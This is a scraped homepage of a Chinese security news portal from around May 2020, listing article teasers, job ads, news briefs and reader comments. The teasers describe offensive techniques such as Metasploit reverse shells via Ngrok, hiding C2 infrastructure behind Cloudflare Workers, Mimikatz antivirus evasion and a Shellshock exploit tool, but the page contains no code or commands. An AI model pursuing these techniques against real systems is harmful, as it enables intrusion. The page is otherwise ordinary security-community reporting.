招聘

2020春季安全技术专场

* 最新

* 观点

* 深度

* 报告

* 视频

* 活动

* 分类 __

数据安全

* 等保测评2.0：Oracle身份鉴别（中） 起于凡而非于凡

2020-05-03

本篇文章主要说一说oracle数据库中身份鉴别控制点中测评项a的相关内容和理解

数据安全

标准与合规

已有 1453 人围观

工具

* Metaspolit下配合Ngrok同时实现内网反弹+转发

waowao

2020-05-03

我既想通过Ngrok在metaspolit下反弹shell，同时又想把对方的3389端口转发到本地，在meterperter下鱼和熊掌我都要！ 工具 已有 2716 人围观

资讯

* 起底世界上最大的防弹主机服务提供商

Avenger

2020-05-02

过去至少十年中，一个被称为Yalishanda、Downlow、Stas_vl的人运营着世界上最受欢迎的“防弹主机”服务提供商之一，该服务满足了众多的恶意需求，如网络钓鱼、网络犯罪论坛、恶意软件下载服务器等。 资讯 已有 3297 人围观

WEB安全

* 挖洞经验 | Facebook OAuth漏洞导致的Facebook账户劫持

clouds

2020-05-02

平时在用“Login with Facebook”功能进行跳转登录时，因为其用到了多个URL重定向跳转，所以总会给我有一种不安全的感觉。

WEB安全 漏洞

已有 5401 人围观 零信任架构实战系列：无密码化方案落地

小议安全

何艺 _190176_

从甲方安全视角，实战出发，对企业安全建设、网络安全、零信任、安全管理、分析进行沉...

关注

解开“撞库”案件中的技术谜团

网安大护法

IRONMAN娄大壮 _69278_ 网络安全 数据合规 安全界的护法者

关注

2020全球数据安全标准和认证展望 腾讯安全联合实验室 腾讯安全联合实验室 _70226_ 腾讯安全七大实验室，针对性解决各领域安全问题，彼此协作、联合对外解决系统性安全问...

关注

基于MITRE ATT&CK框架的KUBERNETES攻击威胁矩阵

虫虫安全

ijzmesec _120413_

IT开发，系统运维、自动化以及网络安全

关注

利用FRIDA手动绕过ANDROID APP证书校验 KALI渗透测试笔记 Scorpio君临天下 _192374_ 渗透测试团队的成长记录

关注

一文掌握CTF中PYTHON全部考点

TIDESEC

TideSec _210883_

Tide安全团队，期待您的加入。www.TideSec.com

关注

零信任架构实战系列：无密码化方案落地

小议安全

何艺 _190176_

从甲方安全视角，实战出发，对企业安全建设、网络安全、零信任、安全管理、分析进行沉...

关注

解开“撞库”案件中的技术谜团

网安大护法

IRONMAN娄大壮 _69278_ 网络安全 数据合规 安全界的护法者

关注

*

资深WEB安全工程师 经验 3-5年 ／本科 25k－50k

*

平安银行

上市公司 / 1000+ / 深圳市

*

高级WEB安全工程师 经验 5-10年 ／本科 20k－50k

*

腾讯

不需要融资 / 1-50 / 深圳市

*

渗透测试工程师 漏洞挖掘方向 经验 1-3年 ／大专 15k－50k

*

阿里巴巴

不需要融资 / 1000+ / 杭州市

更多职位

漏洞

* Windows SMB Ghost（CVE-2020-0796）漏洞分析

ADLab

2020-05-02

微软在其官方SRC发布了CVE-2020-0796的安全公告，本文对该漏洞进行了深入的分析，并在Windows 10系统上进行了复现。 漏洞 已有 8821 人围观

网络安全

* 白话物联网安全（五）：公网数据下的IoT

大胖

2020-05-02

这一章，站在公网的数据角度上我们来看看现在的IoT安全。 网络安全 已有

14736 人围观

工具

* uDork：一款功能强大的Google Hacking工具

Alpha_h4ck

2020-05-01

uDork是一款功能强大的Google Hacking工具，uDork本质上来说，是一个采用Python编程语言开发的脚本工具。 工具 已有 20181 人围观

WEB安全

* 挖洞经验 | 缺乏速率限制（Rate Limitation）导致的Instagram账户密码枚举

clouds

2020-05-01

今天分享的这篇Writeup关于速率限制问题（请求次数限制，Rate Limitation），这也是面向公众网站的设计中常常会忽略掉的防护措施。

WEB安全 漏洞

已有 18319 人围观 ，发现 2

个不明物体

工具

* 在Kali Linux 2020系统中安装、配置和使用cuckoo沙箱

regitnew

2020-05-01

今天为大家介绍在kali linux 2020系统中cuckoo软件及沙箱的安装、配置和使用方法。 工具 已有 20678 人围观

__

潜心学习的小白帽 21961 关注 | 117 文�

关注

最新更新：ThinkPHP系列漏洞之ThinkPHP 2.x 任意代码执行 斗哥将带来ThinkPHP各个版本的漏洞分析文章。

__

I春秋学院

17075 关注 | 398 文�

关注

最新更新：新手篇丨Web安全入门之WebGoat8.0环境搭建 网安学习绝非一朝一夕，这期间我们除了知识的积累，更重要的是进行实践，只有在实践中学会发现问题，解决问

__

兜哥带你学安全 15185 关注 | 23 文�

关注

最新更新：关于云租户安全建设的思路分享 随着企业云化的深入，安全策略成为企业云上建设需要着重考虑的问题，如何安全有效的使用云计算开展自己的业

换一批

工具

* 利用Cloudflare Worker来隐藏C2基础设施

无业废物ksakf

2020-05-01

由于Cloudflare会检查HTTPs请求中的SNI和Host字段能否对应上，所以在Cloudflare利用Domain fronting几乎是不可能的。 工具 已有 24709 人围观 ，发现 1 个不明物体

极客

* 智能网联汽车开发篇：行驶轨迹跟踪

xutiejun

2020-05-01

有时，在老婆下班开车回家的路上，我总是需要打电话问你到哪里了。真希望能有个程序能实时了解车的实时位置。于是有了本篇文章。 极客 已有 20127 人围观

工具

* xShock：一款针对Shellshock漏洞的利用工具

Alpha_h4ck

2020-04-30

xShock是一款针对Shellshock漏洞的利用工具，该工具由Hulya Karabag开发，当前版本号为v1.0.0。在xShock的帮助下，广大安全研究人员可以轻松对ShellShock漏洞（CVE-2014-6271）进行漏洞利用测试。 工具 已有 29613 人围观 ，发现 1 个不明物体

资讯

* 谷歌Project

Zero团队揭苹果众多新漏洞，聊天图像暗藏危机

Sandra1432

2020-04-30

Apple

Mail风波才刚刚过去，谷歌又炸出了苹果一波新漏洞，这一操作是否又让苹果用户的信心碎了一地？ 资讯 已有 32671 人围观 ，发现 2 个不明物体

网络安全

* TrickMo绕过2FA认证

Kriston

2020-04-30

研究人员近期发现Android恶意软件“TrickMo”，该程序可通过TrickBot木马感染用户。 网络安全 已有 26683 人围观 ，发现 1 个不明物体

FreeBuf公开课

*

白帽直播课Live｜小班速成营：零基础带你入门web安全

FB客服

2020-04-30

课程内容包括但不限于Web基础、信息收集、SQL注入漏洞及原理、常见注入、XSS、CSRF和SSRF不得不说的故事、常见漏洞、漏洞扫描、Metasploi框架、WebShell、后渗透、Powershell装逼指南、源代码审计等。 FreeBuf公开课 已有 28249 人围观 ，发现 2 个不明物体

系统安全

* Mimikatz的18种免杀姿势及防御策略

Tide重剑无锋

2020-04-30

Mimikatz是法国人Benjamin Delpy编写的一款轻量级的调试工具，理论上可以抓取所有windows系统的明文密码（winxp之前的好像不行），因此在内网渗透过程中应用非常广。 系统安全 已有 96785 人围观 ，发现 4 个不明物体

查看更多

* 7x24 快讯

loading.....

安徽警方破获非法侵入计算机信息系统案 “黑客”盗取百万余条公民个人信息 安徽滁州市公安局琅琊分局在公安部“净网2020”专项行动中，破获一起特大侵入计算机信息系统盗取公民信息案，在滁州、昆明、西安三地先后抓获赵某、黄某某、李某某三名网络“黑客”，查获被盗的公民个人信息100余万条，扣押电脑硬盘三块、手机5部。

3天前分享到：

打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮 GITLAB奖励研究人员20000美元修复远程代码执行漏洞 GitLab因报告平台上严重的远程代码执行漏洞而向网络安全研究人员授予了20000美元的奖励。3月23日，这个漏洞被程序员兼bug赏金猎人William“vakzz”Bowling发现，并通过HackerOne bug赏金平台私下披露。

3天前分享到：

打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮 900万英国人的公路旅行日志泄露在网络上

Sheffield

市议会的自动车牌识别（ANPR）系统在互联网上曝光了860万条数千人的公路旅行记录，英国监控摄像专员托尼波特（Tony Porter）形容这一安全漏洞“既令人震惊又令人担忧”，并要求对这一漏洞进行全面调查。

3天前分享到：

打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮 俄罗斯黑客被指控入侵LINKEDIN、DROPBOX和FORMSPRING 俄罗斯黑客叶夫根尼·尼库林被控入侵LinkedIn、Dropbox和Formspring，后来又出售了数亿用户的被盗数据。但是在周二的听证会上，他的审判第三次因冠状病毒大流行而中断。

3天前分享到：

打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮 两行代码构成的 NPM 包影响到了数百万项目 一个 npm 小项目的更新给整个 npm 生态系统制造了一场混乱，影响到了数百万 JS 项目。名叫 is-promise 的库包含了两行代码，其它项目可通过一行代码调用使用该库。它的功能是让开发者测试一个

JS 对象是否是

Promise。尽管这个库只有两行代码，但它却是最流行的 npm 包之一，被超过 340 万个项目使用。

4天前分享到：

打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮 WORDPRESS插漏洞允许黑客创建恶意管理帐户 实时查找和替换 WordPress 插件中的一个错误可能允许黑客在超过 100，000 个站点上创建恶意管理员帐户。该漏洞是由 Wordfence 研究人员发现的，它是一个跨站点请求伪造缺陷，可能导致存储的跨站点脚本

（存储 XSS）

攻击。攻击者可以通过单击评论或电子邮件中的恶意链接，=诱使 WordPress 管理员将恶意 JavaScript 注入其网站的页面。

4天前分享到：

打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮 以色列政府称本国水处理公司已遭攻击，督促更改联网系统密码 以色列国家网络局 (INCD) 发布安全警告称，正在督促能源和水行业企业更改所有联网系统的密码。如密码无法修改，则建议关闭这些系统并等待恰当的安全系统到位。

4天前分享到：

打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮 .国务院常务会议部署加快推进信息网络等新型基础设施建设 推动产业和消费升级 国务院总理李克强4月28日主持召开国务院常务会议，听取2019年全国两会建议提案办理情况汇报，促进科学民主决策、提升政府治理效能；部署加快推进信息网络等新型基础设施建设，推动产业和消费升级。

4天前分享到：

打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮 澳大利亚启用COVIDSAFE手机程序，卫生机构要遵守《隐私法》 随着澳大利亚政府在周日推出其COVIDSafe跟踪应用程序，卫生部还发布了该应用程序的隐私评估 。这一款应用程序记录接触的日期、时间、距离和接触时长。收集到的所有信息将被加密后储存到用户手机上，手机用户本人都无法获取信息。

5天前分享到：

打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮 网信办发布《网络安全审查办法》，6月1日起正式实施 国家互联网信息办公室、国家发展和改革委员会、工业和信息化部、公安部、国家安全部等多个部门联合制定了《网络安全审查办法》，现予公布。

5天前分享到：

打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮

Loading...

热点专题

等保2.0，你准备好了吗？

05-03 09:00

等保测评2.0：Oracle身份鉴别（中）

详情>>

超级产品力系列之2020国内抗DDoS产品研究报告

04-13 17:51

超级产品力系列 | 国内抗DDoS产品研究报告公开课即将开课

详情>>

FreeBuf企业安全系列之2020国内WAF产品研究报告

03-05 15:00

重磅 |

FreeBuf企业安全系列之《2020国内WAF产品研究报告》正式发布

详情>>

RSAC 2020专题报道

03-03 10:15

从RSAC看DevSecOps的进化与落地思考

详情>>

等保2.0，你准备好了吗？

05-03 09:00

等保测评2.0：Oracle身份鉴别（中）

详情>>

超级产品力系列之2020国内抗DDoS产品研究报告

04-13 17:51

超级产品力系列 | 国内抗DDoS产品研究报告公开课即将开课

详情>>

有奖投稿 安全报告

* 亮了

* 最新评论

*

《揭秘外挂产业链：流水线式生产，主播组队买挂》 csdn 说: 写得不错 2020-04-29 )104( 亮了

*

《Ninja：一款专为隐藏红队活动的开源C2服务器》 Hoasj 说: 隐藏红队活动了解一下 2020-04-29 )104( 亮了

*

《等保测评2.0：Oracle身份鉴别（上）》 Hoasj 说: 每日一学等保2.0 2020-04-29 )42( 亮了

*

《B站知名up主遭勒索》 口月不是胡 说: 除了做安全的，其实大众的网络安全意识水位还是偏低的 2020-04-28 )23( 亮了

*

《B站知名up主遭勒索》 hotpot 说: 明摆着给up主送视频素材 2020-04-28 )20( 亮了

*

bigendian(1级)

专门登录一下打破2回复尴尬

*

xxx.com

2014年的漏洞了 还有用？

*

ShareWAF

总结的非常全面，针对exe的通用免杀也很棒，期待后续的源码免杀

*

qiushui(1级)

比较核心的站了，国内应该能给到中危？边缘的话基本低危或者忽略吧。

*

System柠枫(1级)

某src:该漏洞真实存在，但危害过低，故忽略！

*

vungsung(1级)

优质文章 +rep

*

Kivlovski(1级)

楼主 能不能求一下web服务器日志数据集 毕业设计要用到 找了好久了没找到合适的 能不能求一下这个数

*

Liam阳0(1级)

来晚了，下次一定

*

cmecme(1级)

bake

*

我要七个老婆(1级)

我想玩去哪买